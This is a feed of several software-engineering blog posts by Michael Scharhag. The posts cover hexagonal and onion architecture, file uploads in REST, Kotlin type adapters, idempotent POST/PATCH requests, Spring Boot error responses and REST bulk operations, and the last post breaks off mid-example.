<p>Note we did not just move the <span class="code">UserDao</span> interface. As <span class="code">UserDao</span> is now part of the domain layer, it uses domain classes (<span class="code">User</span>) instead of database related classes (<span class="code">UserEntity</span>).</p>
<p>This little change is reversing the dependency direction between domain and database layers. The domain layer does no longer depend on the database layer. Instead, the database layer depends on the domain layer as it requires access to the <span class="code">UserDao</span> interface and the <span class="code">User</span> class. The database layer is now responsible for the conversion between <span class="code">User</span> and <span class="code">UserEntity</span>.</p>
<h2>In and out</h2>
<p>While the dependency direction has been changed the call direction stays the same:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-05.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-05.jpg" style="width: 100%; max-width: 350px" /></a></p>
<p>The domain layer is the center of the application. We can say that the presentation layer calls <em>in </em>the domain layer while the domain layer calls <em>out </em>to the database layer.</p>
<p>As a next step, we can split layers into more specific components. For example:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-06.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-06.jpg" style="width: 100%; max-width: 375px" /></a></p>
<p>This is what hexagonal architecture (also called ports and adapters) is about.</p>
<p>We no longer have <em>layers</em> here. Instead, we have the application domain in the center and so-called adapters. Adapters provide additional functionality like user interfaces or database access. Some adapters call <em>in</em> the domain center (here: <em>UI </em>and <em>REST API</em>) while others are <em>outgoing</em> adapters called by the domain center via interfaces (here <em>database</em>, <em>message queue</em> and <em>E-Mail</em>)</p>
<p>This allows us the separate pieces of functionality into different modules/packages while the domain logic does not have any outside dependencies.</p>
<h2>The onion architecture</h2>
<p>From the previous step it is easy to move to the onion architecture (sometimes also called clean architecture).</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-07.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-07.jpg" style="width: 100%; max-width: 450px" /></a></p>
<p>The <em>domain </em>center is split into the <em>domain model</em> and <em>domain services</em> (sometimes called <em>use cases</em>). <em>Application services</em> contains incoming and outgoing adapters. On the out-most layer we locate infrastructure elements like databases or message queues.</p>
<h2>What to remember?</h2>
<p>We looked at the transition from a classic layered architecture to more modern architecture approaches. While the details of hexagonal architecture and onion architecture might vary, both share important parts:</p>
<ul>
<li>The application domain is the core part of the application without any external dependencies. This allows easy testing and modification of domain logic.</li>
<li>Adapters located around the domain logic talk with external systems. These adapters can easily be replaced by different implementations without any changes to the domain logic.</li>
<li>The dependency direction always goes from the outside (adapters, external dependencies) to the inside (domain logic).</li>
<li>The call direction can be <em>in</em> and <em>out </em>of the domain center. At least for calling <em>out </em>of the domain center, we need interfaces to assure the correct dependency direction.</li>
</ul>
<h2>Further reading</h2>
<ul>
<li><a href="https://www.amazon.com/Clean-Architecture-Craftsmans-Software-Structure/dp/0134494164" target="_blank">Clean Architecture: A Craftsman's Guide to Software Structure and Design</a> by Robert C. Martin</li>
<li><a href="https://blog.cleancoder.com/uncle-bob/2012/08/13/the-clean-architecture.html" target="_blank">The Clean Architecture</a> by Robert C. Martin</li>
<li><a href="https://jeffreypalermo.com/2008/07/the-onion-architecture-part-1" target="_blank">The Onion Architecture</a> by Jeffrey Palermo</li>
</ul>2021-09-20T15:26:43ZFile down- and uploads in RESTful web servicesMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-07-27:25dcf4a4-8c68-48b7-8a9d-541f28e20d042021-09-27T16:20:28Z2021-07-28T16:20:28Z<p>Usually we use standard data exchange formats like JSON or XML with REST web services. However, many REST services have at least some operations that can be hard to fulfill with just JSON or XML. Examples are uploads of product images, data imports using uploaded CSV files or generation of downloadable PDF reports.</p>
<p>In this post we focus on those operations, which are often categorized as file down- and uploads. This is a bit flaky as sending a simple JSON document can also be seen as a (JSON) file upload operation.</p>
<h2>Think about the operation you want to express</h2>
<p>A common mistake is to focus on the specific file format that is required for the operation. Instead, we should think about the operation we want to express. The file format just decides the <a href="https://en.wikipedia.org/wiki/Media_type" target="_blank">Media Type</a> used for the operation.</p>
<p>For example, assume we want to design an API that let users upload an avatar image to their user account.</p>
<p>Here, it is usually a good idea to separate the avatar image from the user account resource for various reasons:</p>
<ul>
<li>The avatar image is unlikely to change so it might be a good candidate for caching. On the other, hand the user account resource might contain things like the <em>last login</em> date which changes frequently.</li>
<li>Not all clients accessing the user account might be interested in the avatar image. So, bandwidth can be saved.</li>
<li>For clients it is often preferable to load images separately (think of web applications using <span class="code"><img></span> tags)</li>
</ul>
<p>The user account resource might be accessible via:</p>
<pre>
/users/<user-id></pre>
<p>We can come up with a simple sub-resource representing the avatar image:</p>
<pre>
/users/<user-id>/avatar</pre>
<p>Uploading an avatar is a simple replace operation which can be expressed via PUT:</p>
<pre>
PUT /users/<user-id>/avatar
Content-Type: image/jpeg
<image data>
</pre>
<p>In case a user wants to delete his avatar image, we can use a simple DELETE operation:</p>
<pre>
DELETE /users/<user-id>/avatar
</pre>
<p>And of course clients need a way to show to avatar image. So, we can provide a download operation with GET:</p>
<pre>
GET /users/<user-id>/avatar
</pre>
<p>which returns</p>
<pre>
HTTP/1.1 200 Ok
Content-Type: image/jpeg
<image data>
</pre>
<p>In this simple example we use a new sub-resource with common update, delete, get operations. The only difference is we use an image media type instead of JSON or XML.</p>
<p>Let's look at a different example.</p>
<p>Assume we provide an API to manage product data. We want to extend this API with an option to import products from an uploaded CSV file. Instead of thinking about file uploads we should think about a way to express a <em>product import</em> operation.</p>
<p>Probably the simplest approach is to send a POST request to a separate resource:</p>
<pre>
POST /product-import
Content-Type: text/csv
<csv data>
</pre>
<p>Alternatively, we can also see this as a <em>bulk </em>operation for products. As we learned in another post about <a href="https://www.mscharhag.com/api-design/bulk-and-batch-operations" target="_blank">bulk operations with REST</a>, the PATCH method is a possible way to express a bulk operation on a collection. In this case, the CSV document describes the desired changes to product collection.</p>
<p>For example:</p>
<pre>
PATCH /products
Content-Type: text/csv
action,id,name,price
create,,Cool Gadget,3.99
create,,Nice cap,9.50
delete,42,,
</pre>
<p>This example creates two new products and deletes the product with id <em>42</em>.</p>
<p>Processing file uploads can take a considerable amount of time. So think about designing it as an <a href="https://www.mscharhag.com/api-design/rest-asynchronous-operations" target="_blank">asynchronous REST operation</a>.</p>
<h2>Mixing files and metadata</h2>
<p>In some situations we might need to attach additional metadata to a file. For example, assume we have an API where users can upload holiday photos. Besides the actual image data a photo might also contain a description, a location where it was taken and more.</p>
<p>Here, I would (again) recommend using two separate operations for similar reasons as stated in the previous section with the avatar image. Even if the situation is a bit different here (the data is directly linked to the image) it is usually the simpler approach.</p>
<p>In this case, we can first create a photo resource by sending the actual image:</p>
<pre>
POST /photos
Content-Type: image/jpeg
<image data></pre>
<p>As response we get:</p>
<pre>
HTTP/1.1 201 Created
Location: /photos/123</pre>
<p>After that, we can attach additional metadata to the photo:</p>
<pre>
PUT /photos/123/metadata
Content-Type: application/json
{
"description": "Nice shot of a beach in hawaii",
"location": "hawaii",
"filename": "hawaii-beach.jpg"
}
</pre>
<p>Of course we can also design it the other way around and send the metadata before the image.</p>
<h2>Embedding Base64 encoded files in JSON or XML</h2>
<p>In case splitting file content and metadata in seprate requests it not possible, we can embed files into JSON / XML documents using <a href="https://en.wikipedia.org/wiki/Base64" target="_blank">Base64 encoding</a>. With Base64 encoding we can convert binary formats to a text representation which can be integrated in other text based formats, like JSON or XML.</p>
<p>An example request might look like this:</p>
<pre>
POST /photos
Content-Type: application/json
{
"width": "1280",
"height": "920",
"filename": "funny-cat.jpg",
"image": "TmljZSBleGFt...cGxlIHRleHQ="
}</pre>
<h2>Mixing media-types with multipart requests</h2>
<p>Another possible approach to transfer image data and metadata in a single request / response are <a href="https://www.w3.org/Protocols/rfc1341/7_2_Multipart.html">multipart media types</a>.</p>
<p>Multipart media types require a <span class="code">boundary</span> parameter that is used as delimiter between different body parts. The following request consists of two body parts. The first one contains the image while the second part contains the metadata.</p>
<p>For example</p>
<pre>
POST /photos
Content-Type: multipart/mixed; boundary=foobar
--foobar
Content-Type: image/jpeg
<image data>
--foobar
Content-Type: application/json
{
"width": "1280",
"height": "920",
"filename": "funny-cat.jpg"
}
--foobar--</pre>
<p>Unfortunately multipart requests / responses are often hard to work with. For example, not every REST client might be able to construct these requests and it can be hard to verify responses in unit tests.</p>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>2021-07-28T16:20:28ZKotlin: Type conversion with adaptersMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-06-25:9d938c84-156b-46e1-84f6-877a8464a2cc2021-12-14T14:20:13Z2021-06-27T13:20:13Z<p>In this post we will learn how we can use Kotlin extension functions to provide a simple and elegant type conversion mechanism.</p>
<p>Maybe you have used <a href="https://sling.apache.org/documentation.html" target="_blank">Apache Sling</a> before. In this case, you are probably familiar with <a href="https://sling.apache.org/documentation/the-sling-engine/adapters.html" target="_blank">Slings usage of adapters</a>. We will implement a very similar approach in Kotlin.</p>
<h2>Creating an extension function</h2>
<p>With Kotlins extension functions we can add methods to existing classes. The following declaration adds an <span class="code">adaptTo()</span> method to all sub types of <span class="code">Any</span>.</p>
<pre class="brush: java">
inline fun <reified T : Any> Any.adaptTo(): T {
..
}
</pre>
<p>The generic parameter T parameter specifies the target type that should be returned by the method. We keep the method body empty for the moment.</p>
<p>Converting an Object of type <span class="code">A</span> to another object of type <span class="code">B</span> will look like this with our new method:</p>
<pre class="brush: java">
val a = A("foo")
val b = a.adaptTo<B>()</pre>
<h2>Providing conversion rules with adapters</h2>
<p>In order to implement the <span class="code">adaptTo()</span> method we need a way to define conversion rules.</p>
<p>We use a simple <span class="code">Adapter</span> interface for this:</p>
<pre class="brush: java">
interface Adapter {
fun <T : Any> canAdapt(from: Any, to: KClass<T>): Boolean
fun <T : Any> adaptTo(from: Any, to: KClass<T>): T
}</pre>
<p><span class="code">canAdapt(..)</span> returns <span class="code">true</span> when the implementing class is able to convert the <span class="code">from</span> object to type <span class="code">to</span>.</p>
<p><span class="code">adaptTo(..)</span> performs the actual conversion and returns an object of type <span class="code">to</span>.</p>
<h2>Searching for an appropriate adapter</h2>
<p>Our <span class="code">adaptTo()</span> extension function needs a way to access available adapters. So, we create a simple list that stores our adapter implementations:</p>
<pre class="brush: java">
val adapters = mutableListOf<Adapter>()
</pre>
<p>Within the extension function we can now search the <span class="code">adapters</span> list for a suitable adapter:</p>
<pre class="brush: java">
inline fun <reified T : Any> Any.adaptTo(): T {
val adapter = adapters.find { it.canAdapt(this, T::class) }
?: throw NoSuitableAdapterFoundException(this, T::class)
return adapter.adaptTo(this, T::class)
}
class NoSuitableAdapterFoundException(from: Any, to: KClass<*>)
: Exception("No suitable adapter found to convert $from to type $to")
</pre>
<p>If an adapter is found that can be used for the requested conversion we call <span class="code">adaptTo(..)</span> of the adapter and return the result. In case no suitable adapter is found a <span class="code">NoSuitableAdapterFoundException</span> is thrown.</p>
<h2>Example usage</h2>
<p>Assume we want to convert JSON strings to Kotlin objects using the <a href="https://github.com/FasterXML/jackson" target="_blank">Jackson JSON library</a>. A simple adapter might look like this:</p>
<pre class="brush: java">
class JsonToObjectAdapter : Adapter {
private val objectMapper = ObjectMapper().registerModule(KotlinModule())
override fun <T : Any> canAdapt(from: Any, to: KClass<T>) = from is String
override fun <T : Any> adaptTo(from: Any, to: KClass<T>): T {
require(canAdapt(from, to))
return objectMapper.readValue(from as String, to.java)
}
}</pre>
<p>Now we can use our new extension method to convert a JSON string to a <span class="code">Person</span> object:</p>
<pre class="brush: java">
data class Person(val name: String, val age: Int)
fun main() {
// register available adapter at application start
adapters.add(JsonToObjectAdapter())
...
// actual usage
val json = """
{
"name": "John",
"age" : 42
}
""".trimIndent()
val person = json.adaptTo<Person>()
}</pre>
<p>You can find the <a href="https://github.com/mscharhag/kotlin-adapters" target="_blank">source code of the examples on GitHub</a>.</p>
<p>Within <a href="https://github.com/mscharhag/kotlin-adapters/blob/master/src/main/kotlin/com.mscharhag.adapters/adapters.kt" target="_blank">adapters.kt</a> you find all the required pieces in case you want to try this on your own. In <a href="https://github.com/mscharhag/kotlin-adapters/blob/master/src/main/kotlin/com.mscharhag.adapters/example-usage.kt" target="_blank">example-usage.kt</a> you find some adapter implementations and usage examples.</p>2021-06-27T13:20:13ZMaking POST and PATCH requests idempotentMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-06-13:f515fd49-0aba-49f2-b729-9be61ffa82cc2021-06-13T16:10:46Z2021-06-13T16:10:46Z<p>In an earlier post about <a href="https://www.mscharhag.com/api-design/http-idempotent-safe" target="_blank">idempotency and safety of HTTP methods</a> we learned that idempotency is a positive API feature. It helps making an API more fault-tolerant as a client can safely retry a request in case of connection problems.</p>
<p>The HTTP specification defines GET, HEAD, OPTIONS, TRACE, PUT and DELETE methods as idempotent. From these methods GET, PUT and DELETE are the ones that are usually used in REST APIs. Implementing GET, PUT and DELETE in an idempotent way is typically not a big problem.</p>
<p>POST and PATCH are a bit different, neither of them is specified as idempotent. However, both can be implemented with regard of idempotency making it easier for clients in case of problems. In this post we will explore different options to make POST and PATCH requests idempotent.</p>
<h2>Using a unique business constraint</h2>
<p>The simplest approach to provide idempotency when creating a new resource (usually expressed via POST) is a unique business constraint.</p>
<p>For example, consider we want to create a user resource which requires a unique email address:</p>
<pre>
POST /users
{
"name": "John Doe",
"email": "john@doe.com"
}</pre>
<p>If this request is accidentally sent twice by the client, the second request returns an error because a user with the given email address already exists. In this case, usually HTTP 400 (bad request) or HTTP 409 (conflict) is returned as status code.</p>
<p>Note that the constraint used to provide idempotency does not have to be part of the request body. URI parts and relationship can also help forming a unique constraint.</p>
<p>A good example for this is a resource that relates to a parent resource in a one-to-one relation. For example, assume we want to pay an order with a given order-id.</p>
<p>The payment request might look like this:</p>
<pre>
POST /order/<order-id>/payment
{
... (payment details)
}</pre>
<p>An order can only be paid once so <em>/payment</em> is in a one-to-one relation to its parent resource <em>/order/<order-id></em>. If there is already a payment present for the given order, the server can reject any further payment attempts.</p>
<h2>Using ETags</h2>
<p><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ETag" target="_blank">Entity tags (ETags)</a> are a good approach to make update requests idempotent. ETags are generated by the server based on the current resource representation. The ETag is returned within the <em>ETag</em> header value. For example:</p>
<p>Request</p>
<pre>
GET /users/123</pre>
<p>Response</p>
<pre>
HTTP/1.1 200 Ok
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"
{
"name": "John Doe",
"email": "john@doe.com"
}</pre>
<p>Now assume we want to use a <a href="https://www.mscharhag.com/api-design/rest-partial-updates-patch" target="_blank">JSON Merge Patch</a> request to update the users name:</p>
<pre>
PATCH /users/123
If-Match: "a915ecb02a9136f8cfc0c2c5b2129c4b"
{
"name": "John Smith"
}</pre>
<p>We use the <em>If-Match</em> condition to tell the server only to execute the request if the ETag matches. Updating the resource leads to an updated ETag on the server side. So, if the request is accidentally sent twice, the server rejects the second request because the ETag no longer matches. Usually HTTP 412 (precondition failed) should be returned in this case.</p>
<p>I explained ETags a bit more detailed in my post about <a href="https://www.mscharhag.com/api-design/rest-concurrent-updates" target="_blank">avoiding issues with concurrent updates</a>.</p>
<p>Obviously ETags can only be used if the resource already exists. So this solution cannot be used to ensure idempotency when a resource is created. On the good side this is a standardized and very well understood way.</p>
<h2>Using a separate idempotency key</h2>
<p>Yet another approach is to use a separate client generated key to provide idempotency. In this way the client generates a key and adds it to the request using a custom header (e.g. <em>Idempotency-Key</em>).</p>
<p>For example, a request to create a new user might look like this:</p>
<pre>
POST /users
Idempotency-Key: 1063ef6e-267b-48fc-b874-dcf1e861a49d
{
"name": "John Doe",
"email": "john@doe.com"
}</pre>
<p>Now the server can persist the idempotency key and reject any further requests using the same key.</p>
<p>There are two questions to think about with this approach:</p>
<ul>
<li>How to deal with requests that have not been completed successfully (e.g. by returning HTTP 4xx or 5xx status codes)? Should the idempotency key be saved by the server in these cases? If so, clients always need to use a new idempotency key if they want to retry requests.</li>
<li>What to return if the server retrieves a request with an already known idempotency key.</li>
</ul>
<p>Personally I tend to save the idempotency key only if the request finished sucessfully. In the second case I would return HTTP 409 (conflict) to indicate that a request with the given idempotency key has already been executed.</p>
<p>However, opinions can be different here. For example, the <a href="https://www.youtube.com/watch?v=nnMqSQtSZUQ" target="_blank">Stripe API makes use of an Idempotency-Key header</a>. Stripe saves the idempotency key and the returned response in all cases. If a provided idempotency key is already present, the stored response gets returned without executing the operation again.</p>
<p>The later can confuse the client in my opinion. On the other hand, it gives the client the option retrieve the response of a previously executed request again.</p>
<h2>Summary</h2>
<p>A simple unique business key can be used to provide idempotency for operations that create resources.</p>
<p>For non-creating operations we can use server generated ETags combined with the <em>If-Match</em> header. This approach has the advantage of being standardized and widely known.</p>
<p>As an alternative we can use a client generated idempotency key provided in a custom request header. The server saves those idempotency keys and rejects requests that contain an already used idempotency key. This approach can be used for all types of requests. However, it is not standardized and has some points to think about.</p>
<p> </p>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>2021-06-13T16:10:46ZProviding useful API error messages with Spring BootMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-05-30:321752e9-5b12-468d-9632-acb163fc29f82021-05-30T21:42:08Z2021-05-30T21:42:17Z<p>For API users it is quite important an API provides useful error messages. Otherwise, it can be hard to figure out why things do not work. Debugging what's wrong can quickly become a larger effort for the client than actually implementing useful error responses on the server side. This is especially true if clients are not able to solve the problem themself and additional communication is required.</p>
<p>Nonetheless this topic is often ignored or implemented halfheartedly.</p>
<h2>Client and security perspectives</h2>
<p>There are different perspectives on error messages. Detailed error messages are more helpful for clients while, from a security perspective, it is preferable to expose as little information as possible. Luckily those two views often do not conflict that much, when implemented correctly.</p>
<p>Clients are usually interested in very specific error messages if the error is produced by them. This should usually be indicated by a <a href="https://www.mscharhag.com/api-design/http-status-codes" target="_blank">4xx status code</a>. Here, we need specific messages that point to the mistake made by the client without exposing any internal implementation detail.</p>
<p>On the other hand, if the client request is valid and the error is produced by the server (<a href="http://www.mscharhag.com/api-design/http-status-codes" target="_blank">5xx status codes</a>), we should be conservative with error messages. In this case, the client is not able to solve the problem and therefore does not require any details about the error.</p>
<p>A response indicating an error should contain at least two things: A human readable message and an error code. The first one helps the developer that sees the error message in the log file. The later allows specfic error processing on the client (e.g. showing a specific error message to the user).</p>
<h2>How to build a useful error response in a Spring Boot application?</h2>
<p>Assume we have a small application in which we can publish articles. A simple Spring controller to do this might look like this:</p>
<pre class="brush: java">
@RestController
public class ArticleController {
@Autowired
private ArticleService articleService;
@PostMapping("/articles/{id}/publish")
public void publishArticle(@PathVariable ArticleId id) {
articleService.publishArticle(id);
}
}</pre>
<p>Nothing special here, the controller just delegates the operation to a service, which looks like this:</p>
<pre class="brush: java">
@Service
public class ArticleService {
@Autowired
private ArticleRepository articleRepository;
public void publishArticle(ArticleId id) {
Article article = articleRepository.findById(id)
.orElseThrow(() -> new ArticleNotFoundException(id));
if (!article.isApproved()) {
throw new ArticleNotApprovedException(article);
}
...
}
}</pre>
<p>Inside the service we throw specific exceptions for possible client errors. Note that those exception do not just describe the error. They also carry information that might help us later to produce a good error message:</p>
<pre class="brush: java">
public class ArticleNotFoundException extends RuntimeException {
private final ArticleId articleId;
public ArticleNotFoundException(ArticleId articleId) {
super(String.format("No article with id %s found", articleId));
this.articleId = articleId;
}
// getter
}</pre>
<p>If the exception is specific enough we do not need a generic message parameter. Instead, we can define the message inside the exception constructor.</p>
<p>Next we can use an <span class="code">@ExceptionHandler</span> method in a <span class="code">@ControllerAdvice</span> bean to handle the actual exception:</p>
<pre class="brush: java">
@ControllerAdvice
public class ArticleExceptionHandler {
@ExceptionHandler(ArticleNotFoundException.class)
public ResponseEntity<ErrorResponse> onArticleNotFoundException(ArticleNotFoundException e) {
String message = String.format("No article with id %s found", e.getArticleId());
return ResponseEntity
.status(HttpStatus.NOT_FOUND)
.body(new ErrorResponse("ARTICLE_NOT_FOUND", message));
}
...
}</pre>
<p>If controller methods throw exceptions, Spring tries to find a method annotated with a matching <span class="code">@ExceptionHandler</span> annotation. <span class="code">@ExceptionHandler</span> methods can have flexible method signatures, similar to standard controller methods. For example, we can a <span class="code">HttpServletRequest</span> request parameter and Spring will pass in the current request object. Possible parameters and return types are described in the <a href="https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/ExceptionHandler.html" target="_blank">Javadocs of <span class="code">@ExceptionHandler</span></a>.</p>
<p>In this example, we create a simple <span class="code">ErrorResponse</span> object that consists of an error code and a message.</p>
<p>The message is constructed based on the data carried by the exception. It is also possible to pass the exception message to the client. However, in this case we need to make sure everyone in the team is aware of this and exception messages do not contain sensitive information. Otherwise, we might accidentally leak internal information to the client.</p>
<p><span class="code">ErrorResponse</span> is a simple Pojo used for JSON serialization:</p>
<pre class="brush: java">
public class ErrorResponse {
private final String code;
private final String message;
public ErrorResponse(String code, String message) {
this.code = code;
this.message = message;
}
// getter
}</pre>
<h2>Testing error responses</h2>
<p>A good test suite should not miss tests for specific error responses. In our example we can verify error behaviour in different ways. One way is to use a <a href="https://docs.spring.io/spring-framework/docs/current/reference/html/testing.html#spring-mvc-test-framework" target="_blank">Spring MockMvc</a> test.</p>
<p>For example:</p>
<pre class="brush: java">
@SpringBootTest
@AutoConfigureMockMvc
public class ArticleExceptionHandlerTest {
@Autowired
private MockMvc mvc;
@MockBean
private ArticleRepository articleRepository;
@Test
public void articleNotFound() throws Exception {
when(articleRepository.findById(new ArticleId("123"))).thenReturn(Optional.empty());
mvc.perform(post("/articles/123/publish"))
.andExpect(status().isNotFound())
.andExpect(jsonPath("$.code").value("ARTICLE_NOT_FOUND"))
.andExpect(jsonPath("$.message").value("No article with id 123 found"));
}
}</pre>
<p><br />
Here, we use a mocked <span class="code">ArticleRepository</span> that returns an empty <span class="code">Optional</span> for the passed id. We then verify if the error code and message match the expected strings.</p>
<p>In case you want to learn more about testing spring applications with mock mvc: I recently wrote an article showing how to <a href="https://www.mscharhag.com/spring/clean-mock-mvc-tests" target="_blank">improve Mock mvc tests</a>.</p>
<h2>Summary</h2>
<p>Useful error message are an important part of an API.</p>
<p>If errors are produced by the client (HTTP 4xx status codes) servers should provide a descriptive error response containing at least an error code and a human readable error message. Responses for unexpected server errors (HTTP 5xx) should be conservative to avoid accidental exposure any internal information.</p>
<p>To provide useful error responses we can use specific exceptions that carry related data. Within <span class="code">@ExceptionHandler</span> methods we then construct error messages based on the exception data.</p>2021-05-30T21:42:17ZSupporting bulk operations in REST APIsMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-04-27:1c1fef1c-d41c-45c5-90d0-f139af0c52732022-08-09T19:51:23Z2021-05-03T19:51:23Z<p>Bulk (or batch) operations are used to perform an action on more than one resource in single request. This can help reduce networking overhead. For network performance it is usually better to make fewer requests instead of more requests with less data.</p>
<p>However, before adding support for bulk operations you should think twice if this feature is really needed. Often network performance is not what limits request throughput. You should also consider techniques like <a href="https://en.wikipedia.org/wiki/HTTP_pipelining" rel="nofollow" target="_blank">HTTP pipelining</a> as alternative to improve performance.</p>
<p>When implementing bulk operations we should differentiate between two different cases:</p>
<ul>
<li>Bulk operations that group together many arbitrary operations in one request. For example: <em>Delete product with id 42</em>, <em>create a user named John</em> and <em>retrieve all product-reviews created yesterday</em>.</li>
<li>Bulk operations that perform one operation on different resources of the same type. For example: <em>Delete the products with id 23, 45, 67 and 89</em>.</li>
</ul>
<p>In the next section we will explore different solutions that can help us with both situations. Be aware that the shown solutions might not look very REST-like. Bulk operations in general are not very compatible with REST constraints as we operate on different resources with a single request. So there simply is no real REST solution.</p>
<p>In the following examples we will always return a synchronous response. However, as bulk operations usually take longer to process it is likely you are also interested in an asynchronous processing style. In this case, my post about <a href="https://www.mscharhag.com/api-design/rest-asynchronous-operations" target="_blank">asynchronous operations with REST</a> might also be interesting to you.</p>
<h2>Expressing multiple operations within the request body</h2>
<p>Probably a way that comes to mind quickly is to use a standard data format like JSON to define a list of desired operations.</p>
<p>Let's start with a simple example request:</p>
<pre>
POST /batch
</pre>
<pre>
[
{
"path": "/products",
"method": "post",
"body": {
"name": "Cool Gadget",
"price": "$ 12.45 USD"
}
}, {
"path": "/users/43",
"method": "put",
"body": {
"name": "Paul"
}
},
...
]</pre>
<p>We use a generic <em>/batch</em> endpoint that accepts a simple JSON format to describe desired operations using URIs and HTTP methods. Here, we want to execute a POST request to <em>/products</em> and a PUT request to <em>/users/43</em>.</p>
<p>A response body for the shown request might look like this:</p>
<pre>
[
{
"path": "/products",
"method": "post",
"body": {
"id": 123,
"name": "Cool Gadget",
"price": "$ 12.45 USD"
},
"status": 201
}, {
"path": "/users/43",
"method": "put",
"body": {
"id": 43,
"name": "Paul"
},
"status": 200
},
...
]</pre>
<p>For each requested operation we get a result object containing the URI and HTTP method again. Additionally we get the status code and response body for each operation.</p>
<p>This does not look too bad. In fact, APIs like this can be found in practice. Facebook for example uses a similiar approach to <a href="https://developers.facebook.com/docs/graph-api/making-multiple-requests" rel="nofollow" target="_blank">batch multiple Graph API requests</a>.</p>
<p>However, there are some things to consider with this approach:</p>
<p>How are the desired operations executed on the server side? Maybe it is implemented as simple method call. It is also possible to create a real HTTP requests from the JSON data and then process those requests. In this case, it is important to think about request headers which might contain important information required by the processing endpoint (e.g. authentication tokens, etc.).</p>
<p>Headers in general are missing in this example. However, headers might be important. For example, it is perfectly viable for a server to respond to a POST request with HTTP 201 and an empty body (see my post about <a href="https://www.mscharhag.com/api-design/resource-creation-post" target="_blank">resource creation</a>). The URI of the newly created resource is usually transported using a <em>Location</em> header. Without access to this header the client might not know how to look up the newly created resource. So think about adding support for headers in your request format.</p>
<p>In the example we assume that all requests and responses use JSON data as body which might not always be the case (think of file uploads for example). As alternative we can define the request body as string which gives us more flexibility. In this case, we need to escape JSON double quotes which can be awkward to read:</p>
<p>An example request that includes headers and uses a string body might look like this:</p>
<pre>
[
{
"path": "/users/43",
"method": "put",
"headers": [{
"name": "Content-Type",
"value": "application/json"
}],
"body": "{ \"name\": \"Paul\" }"
},
...
]</pre>
<h2>Multipart Content-Type for the rescue?</h2>
<p>In the previous section we essentially translated HTTP requests and responses to JSON so we can group them together in a single request. However, we can do the same in a more standardized way with multipart content-types.</p>
<p>A multipart <em>Content-Type</em> header indicates that the HTTP message body consists of multiple distinct body parts and each part can have its own <em>Content-Type</em>. We can use this to merge multiple HTTP requests into a single multipart request body.</p>
<p>A quick note before we look at an example: My example snippets for HTTP requests and responses are usually simplified (unnecessary headers, HTTP versions, etc. might be skipped). However, in the next snippet we pack HTTP requests into the body of a multipart request requiring correct HTTP syntax. Therefore, the next snippets use the exact HTTP message syntax.</p>
<p>Now let's look at an example multipart request containing two HTTP requests:</p>
<pre>
1 POST http://api.my-cool-service.com/batch HTTP/1.1
2 Content-Type: multipart/mixed; boundary=request_delimiter
3 Content-Length: <total body length in bytes>
4
5 --request_delimiter
6 Content-Type: application/http
7 Content-ID: fa32d92f-87d9-4097-9aa3-e4aa7527c8a7
8
9 POST http://api.my-cool-service.com/products HTTP/1.1
10 Content-Type: application/json
11
12 {
13 "name": "Cool Gadget",
14 "price": "$ 12.45 USD"
15 }
16 --request_delimiter
17 Content-Type: application/http
18 Content-ID: a0e98ffb-0b62-42a1-a321-54c6e9ef4c99
19
20 PUT http://api.my-cool-service.com/users/43 HTTP/1.1
21 Content-Type: application/json
22
23 {
24 "section": "Section 2"
25 }
26 --request_delimiter--</pre>
<p>Multipart content types require a <em>boundary </em>parameter. This parameter specifies the so-called <em>encapsulation boundary</em> which acts like a delimiter between different body parts.</p>
<p>Quoting the <a href="https://www.w3.org/Protocols/rfc1341/7_2_Multipart.html" target="_blank">RFC</a>:</p>
<blockquote>
<p>The encapsulation boundary is defined as a line consisting entirely of two hyphen characters ("-", decimal code 45) followed by the boundary parameter value from the Content-Type header field.</p>
</blockquote>
<p>In line 2 we set the <em>Content-Type</em> to <em>multipart/mixed</em> with a <em>boundary </em>parameter of <em>request_delimiter</em>. The blank line after the <em>Content-Length</em> header separates HTTP headers from the body. The following lines define the multipart request body.</p>
<p>We start with the <em>encapsulation boundary</em> indicating the beginning of the first body part. Next follow the body part headers. Here, we set the <em>Content-Type</em> header of the body part to <em>application/http</em> which indicates that this body part contains a HTTP message. We also set a <em>Content-Id</em> header which we can be used to identify a specific body part. We use a client generated UUID for this.</p>
<p>The next blank line (line 8) indicates that now the actual body part begins (in our case that's the embedded HTTP request). The first body part ends with the <em>encapsulation boundary</em> at line 16.</p>
<p>After the encapsulation boundary, follows the next body part which uses the same format as the first one.</p>
<p>Note that the <em>encapsulation boundary</em> following the last body part contains two additional hyphens at the end which indicates that no further body parts will follow.</p>
<p>A response to this request might follow the same principle and look like this:</p>
<pre>
1 HTTP/1.1 200
2 Content-Type: multipart/mixed; boundary=response_delimiter
3 Content-Length: <total body length in bytes>
4
5 --response_delimiter
6 Content-Type: application/http
7 Content-ID: fa32d92f-87d9-4097-9aa3-e4aa7527c8a7
8
9 HTTP/1.1 201 Created
10 Content-Type: application/json
11 Location: http://api.my-cool-service.com/products/123
12
13 {
14 "id": 123,
15 "name": "Cool Gadget",
16 "price": "$ 12.45 USD"
17 }
18 --response_delimiter
19 Content-Type: application/http
20 Content-ID: a0e98ffb-0b62-42a1-a321-54c6e9ef4c99
21
22 HTTP/1.1 200 OK
23 Content-Type: application/json
24
25 {
26 "id": 43,
27 "name": "Paul"
28 }
29 --response_delimiter--</pre>
<p>This multipart response body contains two body parts both containing HTTP responses. Note that the first body part also contains a <em>Location </em>header which should be included when sending a HTTP 201 (Created) response status.</p>
